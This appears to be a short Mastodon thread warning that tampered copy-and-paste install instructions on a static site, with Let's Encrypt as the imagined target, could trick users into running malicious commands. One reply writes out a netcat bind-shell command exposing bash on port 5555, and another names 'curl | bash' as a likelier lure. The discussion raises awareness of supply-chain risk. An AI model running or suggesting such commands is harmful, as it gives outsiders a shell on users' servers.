If you think the security of static websites doesn't matter, *imagine* if someone maliciously altered the "copy and paste" instructions for Let's Encrypt. Would you detect the change? (Image below is faked, but you get the point. I'm just using Let's Encrypt as a common example)


@Wolf480pl A made-up malicious tool that when run does something bad on your server.

@climagic @Wolf480pl Whew, a malicious tool making it into a package repository? Not impossible, but not that likely...

If I may suggest, perhaps something nc, where the user is then directed to add the command

nc -nvlp 5555 -e /bin/bash

in place of sslytherinm. If they don't have the firewall setup, then copypasting the command would create a shell bound to port 5555...

@clarjon1 @climagic
IMO a curl | bash would be even more likely to succeed.

Sign in to participate in the conversation

Server run by the main developers of the project 🐘 It is not focused on any particular niche interest - everyone is welcome as long as you follow our code of conduct!